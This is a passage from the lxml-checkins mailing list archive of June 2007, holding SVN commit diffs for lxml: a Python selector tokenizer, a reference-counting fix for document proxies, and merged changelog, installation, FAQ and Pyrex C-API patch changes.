+_illegal_symbol = re.compile(r'[^\w\\-]', 
re.UNICODE) + +def tokenize_symbol(s, pos): + start = pos + match = _illegal_symbol.search(s, pos=pos) + if not match: + # Goes to end of s + return s[start:], len(s) + if match.start() == pos: + assert 0, ( + "Unexpected symbol: %r at %s" % (s[pos], pos)) + if not match: + result = s[start:] + pos = len(s) + else: + result = s[start:match.start()] + pos = match.start() + try: + result = result.decode('unicode_escape') + except UnicodeDecodeError, e: + raise SelectorSyntaxError( + "Bad symbol %r: %s" % (result, e)) + return result, pos + +class TokenStream(object): + + def __init__(self, tokens, source=None): + self.used = [] + self.tokens = iter(tokens) + self.source = source + self.peeked = None + self._peeking = False + + def next(self): + if self._peeking: + self._peeking = False + self.used.append(self.peeked) + return self.peeked + else: + try: + next = self.tokens.next() + self.used.append(next) + return next + except StopIteration: + return None + + def __iter__(self): + return iter(self.next, None) + + def peek(self): + if not self._peeking: + try: + self.peeked = self.tokens.next() + except StopIteration: + return None + self._peeking = True + return self.peeked From scoder at codespeak.net Fri Jun 29 18:53:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 18:53:12 +0200 (CEST) Subject: [Lxml-checkins] r44623 - lxml/trunk/src/lxml Message-ID: <20070629165312.C3B36810E@code0.codespeak.net> Author: scoder Date: Fri Jun 29 18:53:12 2007 New Revision: 44623 Modified: lxml/trunk/src/lxml/etree.pyx lxml/trunk/src/lxml/proxy.pxi lxml/trunk/src/lxml/python.pxd Log: new way to prevent deallocation crashes: count references from _Element to _Document twice, decref them only when deallocating or moving _Element proxies => _Document can no longer be freed in the same GC cycle as its _Elements, will always be freed afterwards Modified: lxml/trunk/src/lxml/etree.pyx 
============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Fri Jun 29 18:53:12 2007 @@ -243,8 +243,8 @@ #displayNode(self._c_doc, 0) #print self._c_doc, self._c_doc.dict is __GLOBAL_PARSER_CONTEXT._c_dict #print self._c_doc, canDeallocateChildNodes(self._c_doc) - #tree.xmlFreeDoc(c_doc) - _deallocDocument(self._c_doc) + tree.xmlFreeDoc(self._c_doc) + #_deallocDocument(self._c_doc) cdef getroot(self): cdef xmlNode* c_node Modified: lxml/trunk/src/lxml/proxy.pxi ============================================================================== --- lxml/trunk/src/lxml/proxy.pxi (original) +++ lxml/trunk/src/lxml/proxy.pxi Fri Jun 29 18:53:12 2007 @@ -27,6 +27,8 @@ #print "registering for:", proxy._c_node assert c_node._private is NULL, "double registering proxy!" c_node._private = proxy + # additional INCREF to make sure _Document is GC-ed LAST! + python.Py_INCREF(proxy._doc) cdef unregisterProxy(_Element proxy): """Unregister a proxy for the node it's proxying for. @@ -35,6 +37,7 @@ c_node = proxy._c_node assert c_node._private is proxy, "Tried to unregister unknown proxy" c_node._private = NULL + python.Py_DECREF(proxy._doc) ################################################################################ # temporarily make a node the root node of its document @@ -170,18 +173,18 @@ tree.END_FOR_EACH_ELEMENT_FROM(c_node) return 1 -cdef void _deallocDocument(xmlDoc* c_doc): - """We cannot rely on Python's GC to *always* dealloc the _Document *after* - all proxies it contains => traverse the document and mark all its proxies - as dead by deleting their xmlNode* reference. 
- """ - cdef xmlNode* c_node - c_node = c_doc.children - tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_doc, c_node, 1) - if c_node._private is not NULL: - (<_Element>c_node._private)._c_node = NULL - tree.END_FOR_EACH_ELEMENT_FROM(c_node) - tree.xmlFreeDoc(c_doc) +## cdef void _deallocDocument(xmlDoc* c_doc): +## """We cannot rely on Python's GC to *always* dealloc the _Document *after* +## all proxies it contains => traverse the document and mark all its proxies +## as dead by deleting their xmlNode* reference. +## """ +## cdef xmlNode* c_node +## c_node = c_doc.children +## tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_doc, c_node, 1) +## if c_node._private is not NULL: +## (<_Element>c_node._private)._c_node = NULL +## tree.END_FOR_EACH_ELEMENT_FROM(c_node) +## tree.xmlFreeDoc(c_doc) ################################################################################ # fix _Document references and namespaces when a node changes documents @@ -303,6 +306,8 @@ if c_element._private is not NULL: element = <_Element>c_element._private if element._doc is not doc: + python.Py_INCREF(doc) + python.Py_DECREF(element._doc) element._doc = doc if c_element is c_start_node: @@ -321,7 +326,11 @@ # fix _Document reference (may dealloc the original document!) 
if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + python.Py_INCREF(doc) + python.Py_DECREF(element._doc) + element._doc = doc if c_element is c_start_node: break Modified: lxml/trunk/src/lxml/python.pxd ============================================================================== --- lxml/trunk/src/lxml/python.pxd (original) +++ lxml/trunk/src/lxml/python.pxd Fri Jun 29 18:53:12 2007 @@ -9,6 +9,7 @@ cdef int PY_SSIZE_T_MAX cdef void Py_INCREF(object o) + cdef void Py_DECREF(object o) cdef FILE* PyFile_AsFile(object p) cdef int PyFile_Check(object p) From ianb at codespeak.net Fri Jun 29 19:05:44 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 29 Jun 2007 19:05:44 +0200 (CEST) Subject: [Lxml-checkins] r44624 - in lxml/branch/html: . doc doc/html src/lxml src/lxml/tests src/lxml/tests/include tools Message-ID: <20070629170544.7AA5F811D@code0.codespeak.net> Author: ianb Date: Fri Jun 29 19:05:43 2007 New Revision: 44624 Added: lxml/branch/html/src/lxml/tests/include/ - copied from r44623, lxml/trunk/src/lxml/tests/include/ lxml/branch/html/src/lxml/tests/include/test_xinclude.xml - copied unchanged from r44623, lxml/trunk/src/lxml/tests/include/test_xinclude.xml lxml/branch/html/tools/ - copied from r44623, lxml/trunk/tools/ lxml/branch/html/tools/xpathgrep.py - copied unchanged from r44623, lxml/trunk/tools/xpathgrep.py Removed: lxml/branch/html/Pyrex-0.9.4.1-public-api.patch lxml/branch/html/src/lxml/tests/test_xinclude.xml Modified: lxml/branch/html/CHANGES.txt lxml/branch/html/INSTALL.txt lxml/branch/html/MANIFEST.in lxml/branch/html/doc/FAQ.txt lxml/branch/html/doc/compatibility.txt lxml/branch/html/doc/html/style.css lxml/branch/html/doc/intro.txt lxml/branch/html/doc/main.txt lxml/branch/html/doc/objectify.txt lxml/branch/html/doc/parsing.txt lxml/branch/html/doc/performance.txt lxml/branch/html/doc/tutorial.txt lxml/branch/html/setup.py 
lxml/branch/html/setupinfo.py lxml/branch/html/src/lxml/ElementInclude.py lxml/branch/html/src/lxml/apihelpers.pxi lxml/branch/html/src/lxml/builder.py lxml/branch/html/src/lxml/etree.pyx lxml/branch/html/src/lxml/iterparse.pxi lxml/branch/html/src/lxml/objectify.pyx lxml/branch/html/src/lxml/parser.pxi lxml/branch/html/src/lxml/proxy.pxi lxml/branch/html/src/lxml/python.pxd lxml/branch/html/src/lxml/tests/test_elementtree.py lxml/branch/html/src/lxml/tests/test_etree.py lxml/branch/html/src/lxml/tests/test_htmlparser.py lxml/branch/html/src/lxml/tests/test_objectify.py lxml/branch/html/src/lxml/tree.pxd lxml/branch/html/src/lxml/xmlerror.pxi lxml/branch/html/src/lxml/xmlparser.pxd lxml/branch/html/src/lxml/xmlschema.pxi lxml/branch/html/version.txt lxml/branch/html/versioninfo.py Log: svn merge -r44104:HEAD http://codespeak.net/svn/lxml/trunk Modified: lxml/branch/html/CHANGES.txt ============================================================================== --- lxml/branch/html/CHANGES.txt (original) +++ lxml/branch/html/CHANGES.txt Fri Jun 29 19:05:43 2007 @@ -2,18 +2,18 @@ lxml changelog ============== -Under Development +Under development ================= Features added -------------- +* E-factory support for lxml.objectify (``objectify.E``) + * Entity support through an ``Entity`` factory and element classes. XML parsers now have a ``resolve_entities`` keyword argument that can be set to False to keep entities in the document. -* ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. 
- * ``column`` field on error log entries to accompany the ``line`` field * Error specific messages in XPath parsing and evaluation @@ -23,75 +23,65 @@ * The regular expression functions in XPath now support passing a node-set instead of a string -* ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support - adding processing instructions and comments around the root node - -* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods - -* Extended type annotation in objectify: cleaner annotation namespace setup - plus new ``xsiannotate()`` and ``deannotate()`` functions - -* Support for custom Element class instantiation in lxml.sax: passing a - ``makeelement`` function to the ElementTreeContentHandler will reuse the - lookup context of that function - -* '.' represents empty ObjectPath (identity) +* Extended type annotation in objectify: new ``xsiannotate()`` function * EXSLT RegExp support in standard XPath (not only XSLT) -* ``lxml.pyclasslookup`` module that can access the entire tree in read-only - mode to help determining a suitable Element class - -* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` - -* ``collectAttributes()`` C-function to build a list of attribute - keys/values/items for a libxml2 node - Bugs fixed ---------- * ``Element.getiterator(tag)`` did not accept ``Comment`` and ``ProcessingInstruction`` as tags +* Reference-counting bug in ``Element.attrib.pop()`` + * The XML parser did not report undefined entities as error * The text in exceptions raised by XML parsers, validators and XPath evaluators now reports the first error that occurred instead of the last -* XSLT parsing failed to pass resolver context on to imported documents +* passing '' as XPath namespace prefix did not raise an error -* ``ETXPath`` was missing the ``regexp`` keyword argument +* Thread safety in XPath evaluators -* passing '' as XPath namespace prefix did not raise an error +Other changes +------------- -* passing '' 
as namespace prefix in nsmap could be passed through to libxml2 +* major refactoring in XPath/XSLT extension function code -* Objectify couldn't handle prefixed XSD type names in ``xsi:type`` -* More ET compatible behaviour when writing out XML declarations or not +1.3 (2007-06-24) +================ -* More robust error handling in ``iterparse()`` +Features added +-------------- -* Documents lost their top-level PIs and comments on serialisation +* Module ``lxml.pyclasslookup`` module implements an Element class lookup + scheme that can access the entire tree in read-only mode to help determining + a suitable Element class -* lxml.sax failed on comments and PIs. Comments are now properly ignored and - PIs are copied. +* Parsers take a ``remove_comments`` keyword argument that skips over comments -* Thread safety in XPath evaluators +* ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. -* Raise AssertionError when passing strings containing '\0' bytes +* ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support + adding processing instructions and comments around the root node -Other changes -------------- +* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods -* major refactoring in XPath/XSLT extension function code +* Extended type annotation in objectify: cleaner annotation namespace setup + plus new ``deannotate()`` function + +* Support for custom Element class instantiation in lxml.sax: passing a + ``makeelement`` function to the ElementTreeContentHandler will reuse the + lookup context of that function +* '.' 
represents empty ObjectPath (identity) -1.3beta (2007-02-27) -==================== +* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` -Features added --------------- +* ``collectAttributes()`` C-function to build a list of attribute + keys/values/items for a libxml2 node * ``DTD`` validator class (like ``RelaxNG`` and ``XMLSchema``) @@ -109,6 +99,35 @@ Bugs fixed ---------- +* Removing Elements from a tree could make them loose their namespace + declarations + +* ``ElementInclude`` didn't honour base URL of original document + +* Replacing the children slice of an Element would cut off the tails of the + original children + +* ``Element.getiterator(tag)`` did not accept ``Comment`` and + ``ProcessingInstruction`` as tags + +* API functions now check incoming strings for XML conformity. Zero bytes or + low ASCII characters are no longer accepted (AssertionError). + +* XSLT parsing failed to pass resolver context on to imported documents + +* passing '' as namespace prefix in nsmap could be passed through to libxml2 + +* Objectify couldn't handle prefixed XSD type names in ``xsi:type`` + +* More ET compatible behaviour when writing out XML declarations or not + +* More robust error handling in ``iterparse()`` + +* Documents lost their top-level PIs and comments on serialisation + +* lxml.sax failed on comments and PIs. Comments are now properly ignored and + PIs are copied. + * Possible memory leaks in namespace handling when moving elements between documents Modified: lxml/branch/html/INSTALL.txt ============================================================================== --- lxml/branch/html/INSTALL.txt (original) +++ lxml/branch/html/INSTALL.txt Fri Jun 29 19:05:43 2007 @@ -8,10 +8,12 @@ You need libxml2 and libxslt, in particular: -* libxml 2.6.16 or later. It can be found here: +* libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html -* libxslt 1.1.12 or later. 
It can be found here: + If you want to use XPath reliably, try to avoid libxml2 2.6.27. + +* libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Newer versions generally contain less bugs and are therefore recommended. The @@ -19,30 +21,31 @@ parsing horribly broken HTML. XML Schema support is also still worked on in libxml2, so newer versions will give you better complience with the W3C spec. -For Windows, there is a `binary distribution`_ of libxml2 and libxslt. Note -that you need both libxml2 and libxslt, as well as iconv and zlib. You can -then install the `binary egg distribution`_ of lxml (see below). -.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html -.. _`binary egg distribution`: http://cheeseshop.python.org/pypi/lxml +Installation +------------ -On MacOS-X 10.4, you can use the installed system libraries and the binary egg -distribution of lxml. Note that the libxslt version on this system is older -than the required version above. While there were not any bug reports so far, -you may still encounter certain differences in behaviour in rare cases. - -If you want to build lxml from SVN, you also need Pyrex_. Please read `how to -build lxml from source`_ in this case. If you are using a released version of -lxml, it should come with the generated C file in the source distribution, so -no Pyrex is needed in that case. +If you have easy_install_, you can run the following as super-user (or +administrator):: + + easy_install lxml + +.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall + +This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as +libxml2 and libxslt are properly installed (including development packages, +i.e. header files etc.). -.. _Pyrex: http://www.cosc.canterbury.ac.nz/~greg/python/Pyrex/ -.. 
_`how to build lxml from source`: build.html -Note that Pyrex up to and including version 0.9.4 has known problems when -compiling lxml with gcc 4.0 or Python 2.4. Do not use it. If you want to -build lxml from non-release sources, please install Pyrex version 0.9.4.1 or -later. +Building lxml from sources +-------------------------- + +If you want to build lxml from SVN you should read `how to build lxml from +source`_ (or the file ``build.txt`` in the ``doc`` directory of the source +tree). Both the subversion sources and the source distribution ship with an +adapted version of Pyrex, so you do not need Pyrex installed. + +.. _`how to build lxml from source`: build.html If you have read these instructions and still cannot manage to install lxml, you can check the archives of the `mailing list`_ to see if your problem is @@ -51,16 +54,30 @@ .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev -Installation ------------- +MS Windows +---------- -If you have easy_install_, you can run the following as super-user:: +For MS Windows, the `binary egg distribution of lxml`_ is statically built +against the libraries, i.e. it already includes them. There is no need to +install the external libraries if you use an official lxml build from +cheeseshop. + +If you want to upgrade the libraries and/or compile lxml from sources, you +should install a `binary distribution`_ of libxml2 and libxslt. You need both +libxml2 and libxslt, as well as iconv and zlib. - easy_install lxml +.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html +.. _`binary egg distribution of lxml`: http://cheeseshop.python.org/pypi/lxml -.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall -This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as -libxml2 and libxslt are properly installed. 
To compile and install lxml -without easy_install, please read `how to build lxml from source`_ (or the -file ``build.txt`` in the ``doc`` directory of the source tree). +MacOS-X +------- + +On MacOS-X 10.4, you can try to use the installed system libraries when you +build lxml yourself. However, the library versions on this system are older +than the required versions, so you may encounter certain differences in +behaviour or even crashes. A number of users reported success with updated +libraries (e.g. using fink_), but needed to set the environment variable +``DYLD_LIBRARY_PATH`` to the directory where fink keeps the libraries. + +.. _fink: http://finkproject.org/ Modified: lxml/branch/html/MANIFEST.in ============================================================================== --- lxml/branch/html/MANIFEST.in (original) +++ lxml/branch/html/MANIFEST.in Fri Jun 29 19:05:43 2007 @@ -5,10 +5,12 @@ include MANIFEST.in version.txt include CHANGES.txt CREDITS.txt INSTALL.txt LICENSES.txt README.txt TODO.txt recursive-include src *.pyx *.pxd *.pxi *.py -recursive-include src/lxml etree.c objectify.c etree.h etree_defs.h +recursive-include src/lxml etree.c objectify.c pyclasslookup.c etree.h etree_defs.h recursive-include src/lxml/tests *.rng *.xslt *.xml *.dtd recursive-include benchmark *.py recursive-include doc *.txt *.html *.css *.xml *.mgp pubkey.asc -recursive-include Pyrex *.py +include Pyrex/__init__.py +recursive-include Pyrex/Compiler *.py +recursive-include Pyrex/Distutils *.py include doc/mkhtml.py doc/rest2html.py exclude doc/pyrex.txt src/lxml/etree.pxi Deleted: /lxml/branch/html/Pyrex-0.9.4.1-public-api.patch ============================================================================== --- /lxml/branch/html/Pyrex-0.9.4.1-public-api.patch Fri Jun 29 19:05:43 2007 +++ (empty file) @@ -1,239 +0,0 @@ -Index: Pyrex/Compiler/Nodes.py -=================================================================== ---- Pyrex/Compiler/Nodes.py (Revision 151) -+++ 
Pyrex/Compiler/Nodes.py (Arbeitskopie) -@@ -114,24 +114,28 @@ - self.generate_h_code(env, result) - - def generate_h_code(self, env, result): -- public_vars_and_funcs = [] -+ public_vars = [] -+ public_funcs = [] - public_extension_types = [] - for entry in env.var_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_vars.append(entry) - for entry in env.cfunc_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_funcs.append(entry) - for entry in env.c_class_entries: - if entry.visibility == 'public': - public_extension_types.append(entry) -- if public_vars_and_funcs or public_extension_types: -+ if public_vars or public_funcs or public_extension_types: - result.h_file = replace_suffix(result.c_file, ".h") - result.i_file = replace_suffix(result.c_file, ".pxi") - h_code = Code.CCodeWriter(result.h_file) - i_code = Code.PyrexCodeWriter(result.i_file) -+ header_barrier = "__HAS_PYX_" + env.module_name -+ h_code.putln("#ifndef %s" % header_barrier) -+ h_code.putln("#define %s" % header_barrier) - self.generate_extern_c_macro_definition(h_code) -- for entry in public_vars_and_funcs: -+ for entry in public_vars: - h_code.putln("%s %s;" % ( - Naming.extern_c_macro, - entry.type.declaration_code( -@@ -141,7 +145,23 @@ - for entry in public_extension_types: - self.generate_cclass_header_code(entry.type, h_code) - self.generate_cclass_include_code(entry.type, i_code) -+ if public_funcs: -+ for entry in public_funcs: -+ h_code.putln( -+ 'static %s;' % -+ entry.type.declaration_code("(*%s)" % entry.cname)) -+ i_code.putln("cdef extern %s" % -+ entry.type.declaration_code(entry.cname, pyrex = 1)) -+ h_code.putln( -+ "static struct {char *s; void **p;} _%s_API[] = {" % -+ env.module_name) -+ for entry in public_funcs: -+ h_code.putln('{"%s", &%s},' % (entry.cname, entry.cname)) -+ h_code.putln("{0, 0}") -+ h_code.putln("};") -+ self.generate_c_api_import_code(env, h_code) - 
h_code.putln("PyMODINIT_FUNC init%s(void);" % env.module_name) -+ h_code.putln("#endif /* %s */" % header_barrier) - - def generate_cclass_header_code(self, type, h_code): - #h_code.putln("extern DL_IMPORT(PyTypeObject) %s;" % type.typeobj_cname) -@@ -180,6 +200,7 @@ - self.body.generate_function_definitions(env, code) - self.generate_interned_name_table(env, code) - self.generate_py_string_table(env, code) -+ self.generate_c_api_table(env, code) - self.generate_typeobj_definitions(env, code) - self.generate_method_table(env, code) - self.generate_filename_init_prototype(code) -@@ -437,10 +458,12 @@ - dll_linkage = None - header = entry.type.declaration_code(entry.cname, - dll_linkage = dll_linkage) -- if entry.visibility <> 'private': -+ if entry.visibility == 'private': -+ storage_class = "static " -+ elif entry.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s; /*proto*/" % ( - storage_class, - header)) -@@ -1090,6 +1113,63 @@ - code.putln( - "};") - -+ def generate_c_api_table(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry.cname) -+ if public_funcs: -+ env.use_utility_code(c_api_import_code); -+ code.putln( -+ "static __Pyx_CApiTabEntry %s[] = {" % -+ Naming.c_api_tab_cname) -+ public_funcs.sort() -+ for entry_cname in public_funcs: -+ code.putln('{"%s", %s},' % (entry_cname, entry_cname)) -+ code.putln( -+ "{0, 0}") -+ code.putln( -+ "};") -+ -+ def generate_c_api_import_code(self, env, h_code): -+ # this is written to the header file! -+ h_code.put(""" -+ /* Return -1 and set exception on error, 0 on success. 
*/ -+ static int -+ import_%(name)s(PyObject *module) -+ { -+ if (module != NULL) { -+ PyObject *c_api_init = PyObject_GetAttrString( -+ module, "_import_c_api"); -+ if (!c_api_init) -+ return -1; -+ if (PyCObject_Check(c_api_init)) -+ { -+ int (*init)(struct {const char *s; const void **p;}*) = -+ PyCObject_AsVoidPtr(c_api_init); -+ if (!init) { -+ PyErr_SetString(PyExc_RuntimeError, -+ "module returns NULL pointer for C API call"); -+ return -1; -+ } -+ init(_%(name)s_API); -+ } -+ Py_DECREF(c_api_init); -+ } -+ return 0; -+ } -+ """.replace('\n ', '\n') % {'name' : env.module_name}) -+ -+ def generate_c_api_init_code(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry) -+ if public_funcs: -+ code.putln('if (__Pyx_InitCApi(%s) < 0) %s' % ( -+ Naming.module_cname, -+ code.error_goto(self.pos))) -+ - def generate_filename_init_prototype(self, code): - code.putln(""); - code.putln("static void %s(void); /*proto*/" % Naming.fileinit_cname) -@@ -1109,6 +1189,8 @@ - self.generate_intern_code(env, code) - #code.putln("/*--- String init code ---*/") - self.generate_string_init_code(env, code) -+ #code.putln("/*--- External C API setup code ---*/") -+ self.generate_c_api_init_code(env, code) - #code.putln("/*--- Global init code ---*/") - self.generate_global_init_code(env, code) - #code.putln("/*--- Type import code ---*/") -@@ -1862,10 +1944,12 @@ - dll_linkage = None - header = self.return_type.declaration_code(entity, - dll_linkage = dll_linkage) -- if self.visibility <> 'private': -+ if self.visibility == 'private': -+ storage_class = "static " -+ elif self.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s {" % ( - storage_class, - header)) -@@ -3550,6 +3634,7 @@ - - utility_function_predeclarations = \ - """ -+typedef struct {const char *s; const void **p;} __Pyx_CApiTabEntry; 
/*proto*/ - typedef struct {PyObject **p; char *s;} __Pyx_InternTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s; long n;} __Pyx_StringTabEntry; /*proto*/ - static PyObject *__Pyx_UnpackItem(PyObject *, Py_ssize_t); /*proto*/ -@@ -3572,6 +3657,8 @@ - static PyObject *__Pyx_CreateClass(PyObject *bases, PyObject *dict, PyObject *name, char *modname); /*proto*/ - static int __Pyx_InternStrings(__Pyx_InternTabEntry *t); /*proto*/ - static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); /*proto*/ -+static int __Pyx_InitCApi(PyObject *module); /*proto*/ -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t); /*proto*/ - """ - - get_name_predeclaration = \ -@@ -4056,3 +4143,37 @@ - """; - - #------------------------------------------------------------------------------------ -+ -+c_api_import_code = \ -+""" -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t) { -+ __Pyx_CApiTabEntry *api_t; -+ while (t->s) { -+ if (*t->s == '\0') -+ continue; /* shortcut for erased string entries */ -+ api_t = %(API_TAB)s; -+ while ((api_t->s) && (strcmp(api_t->s, t->s) < 0)) -+ ++api_t; -+ if ((!api_t->p) || (strcmp(api_t->s, t->s) != 0)) { -+ PyErr_Format(PyExc_ValueError, -+ "Unknown function name in C API: %%s", t->s); -+ return -1; -+ } -+ *t->p = api_t->p; -+ ++t; -+ } -+ return 0; -+} -+ -+static int __Pyx_InitCApi(PyObject *module) { -+ int result; -+ PyObject* cobj = PyCObject_FromVoidPtr(&__Pyx_ImportModuleCApi, NULL); -+ if (!cobj) -+ return -1; -+ -+ result = PyObject_SetAttrString(module, "_import_c_api", cobj); -+ Py_DECREF(cobj); -+ return result; -+} -+""" % {'API_TAB' : Naming.c_api_tab_cname} -+#------------------------------------------------------------------------------------ -Index: Pyrex/Compiler/Naming.py -=================================================================== ---- Pyrex/Compiler/Naming.py (Revision 151) -+++ Pyrex/Compiler/Naming.py (Arbeitskopie) -@@ -50,5 +50,6 @@ - self_cname = pyrex_prefix + "self" - stringtab_cname = 
pyrex_prefix + "string_tab" - vtabslot_cname = pyrex_prefix + "vtab" -+c_api_tab_cname = pyrex_prefix + "c_api_tab" - - extern_c_macro = pyrex_prefix.upper() + "EXTERN_C" Modified: lxml/branch/html/doc/FAQ.txt ============================================================================== --- lxml/branch/html/doc/FAQ.txt (original) +++ lxml/branch/html/doc/FAQ.txt Fri Jun 29 19:05:43 2007 @@ -6,8 +6,8 @@ :description: Frequently Asked Questions about lxml (FAQ) :keywords: lxml, lxml.etree, FAQ, frequently asked questions - -See also the notes on compatibility_ to ElementTree_. +Frequently asked questions on lxml. See also the notes on compatibility_ to +ElementTree_. .. _compatibility: compatibility.html .. _ElementTree: http://effbot.org/zone/element-index.htm @@ -18,30 +18,32 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Where are the Windows binaries? - 1.5 What is the difference between lxml.etree and lxml.objectify? - 1.6 How can I make my application run faster? - 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? - 2 Contributing - 2.1 Why is lxml not written in Python? - 2.2 How can I contribute? - 3 Bugs - 3.1 My application crashes! Why does lxml.etree do that? - 3.2 I think I have found a bug in lxml. What should I do? - 4 Threading - 4.1 Can I use threads to concurrently access the lxml API? - 4.2 Does my program run faster if I use threads? - 4.3 Would my single-threaded program run faster if I turned off threading? - 5 Parsing and Serialisation - 5.1 Why doesn't the ``pretty_print`` option reformat my XML output? - 5.2 Why can't lxml parse my XML from unicode strings? - 5.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? - 5.4 Why can't I just delete parents or clear the root node in iterparse()? - 6 XPath and Document Traversal - 6.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? 
- 6.2 Why doesn't ``findall()`` support full XPath expressions? - 6.3 How can I find out which namespace prefixes are used in a document? - 6.4 How can I specify a default namespace for XPath expressions? + 1.4 What is the difference between lxml.etree and lxml.objectify? + 1.5 How can I make my application run faster? + 2 Installation + 2.1 Which version of libxml2 and libxslt should I use or require? + 2.2 Where are the Windows binaries? + 2.3 Why do I get errors about missing UCS4 symbols when installing lxml? + 3 Contributing + 3.1 Why is lxml not written in Python? + 3.2 How can I contribute? + 4 Bugs + 4.1 My application crashes! + 4.2 I think I have found a bug in lxml. What should I do? + 5 Threading + 5.1 Can I use threads to concurrently access the lxml API? + 5.2 Does my program run faster if I use threads? + 5.3 Would my single-threaded program run faster if I turned off threading? + 6 Parsing and Serialisation + 6.1 Why doesn't the ``pretty_print`` option reformat my XML output? + 6.2 Why can't lxml parse my XML from unicode strings? + 6.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? + 6.4 Why can't I just delete parents or clear the root node in iterparse()? + 7 XPath and Document Traversal + 7.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? + 7.2 Why doesn't ``findall()`` support full XPath expressions? + 7.3 How can I find out which namespace prefixes are used in a document? + 7.4 How can I specify a default namespace for XPath expressions? General Questions @@ -50,10 +52,16 @@ Is there a tutorial? -------------------- -There is a `tutorial for ElementTree`_ which also works for ``lxml.etree``. +Read the `lxml.etree Tutorial`_. While this is still work in progress (just +as any good documentation), it provides an overview of the most important +concepts in ``lxml.etree``. If you want to help out, the tutorial is a very +good place to start. 
+ +There is also a `tutorial for ElementTree`_ which works for ``lxml.etree``. The `API documentation`_ also contains many examples for ``lxml.etree``. To learn using ``lxml.objectify``, read the `objectify documentation`_. +.. _`lxml.etree Tutorial`: tutorial.html .. _`tutorial for ElementTree`: http://effbot.org/zone/element.htm .. _`API documentation`: api.html .. _`objectify documentation`: objectify.html @@ -83,7 +91,7 @@ strictly compliant way. As of release 2.4.16, libxml2 passed all 1800+ tests from the OASIS XML Tests Suite. -lxml currently supports libxml2 2.6.16 or later, which has even better support +lxml currently supports libxml2 2.6.20 or later, which has even better support for various XML standards. Some of the more important ones are: HTML, XML namespaces, XPath, XInclude, XSLT, XML catalogs, canonical XML, RelaxNG, XML:ID. Support for XML Schema and Schematron is currently incomplete in @@ -91,32 +99,6 @@ supports loading documents through HTTP and FTP. -Where are the Windows binaries? -------------------------------- - -Short answer: If you want to contribute a binary build, we are happy to put it -up on the Cheeseshop. - -Long answer: Two of the bigger problems with the Windows system are the lack -of a pre-installed standard compiler and the missing package management. Both -make it non-trivial to build lxml on this platform. We are trying hard to -make lxml as platform-independent as possible and it is regularly tested on -Windows systems. However, we currently cannot provide Windows binary -distributions ourselves. - -From time to time, users of different environments kindly contribute binary -builds of lxml, most frequently for Windows or Mac-OS X. We put these on the -Cheeseshop to make it as easy as possible for others to use lxml on their -platform. 
- -If there is not currently a binary distribution of the most recent lxml -release for your platform available from the Cheeseshop, please look through -the older versions to see if they provide a binary build. This is done by -appending the version number to the cheeseshop URL, e.g.: - - http://cheeseshop.python.org/pypi/lxml/1.1.2 - - What is the difference between lxml.etree and lxml.objectify? ------------------------------------------------------------- @@ -159,6 +141,63 @@ .. _threading: #threading +Installation +============ + +Which version of libxml2 and libxslt should I use or require? +------------------------------------------------------------- + +It really depends on your application, but the rule of thumb is: more recent +versions contain fewer bugs and provide more features. + +* Try to use versions of both libraries that were released together. At least + the libxml2 version should not be older than the libxslt version. + +* If you use XML Schema or Schematron which are still under development, the + most recent version of libxml2 is usually a good bet. + +* The same applies to XPath, where a substantial number of bugs and memory + leaks were fixed over time. If you encounter crashes or memory leaks in + XPath applications, try a more recent version of libxml2. + +* For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. + +* For the normal tree handling, however, any libxml2 version starting with + 2.6.20 should do. + +Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to +see when (or if) a specific bug has been fixed. + +.. _`release notes of libxml2`: http://xmlsoft.org/news.html +.. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html + + +Where are the Windows binaries? +------------------------------- + +Short answer: If you want to contribute a binary build, we are happy to put it +up on the Cheeseshop.
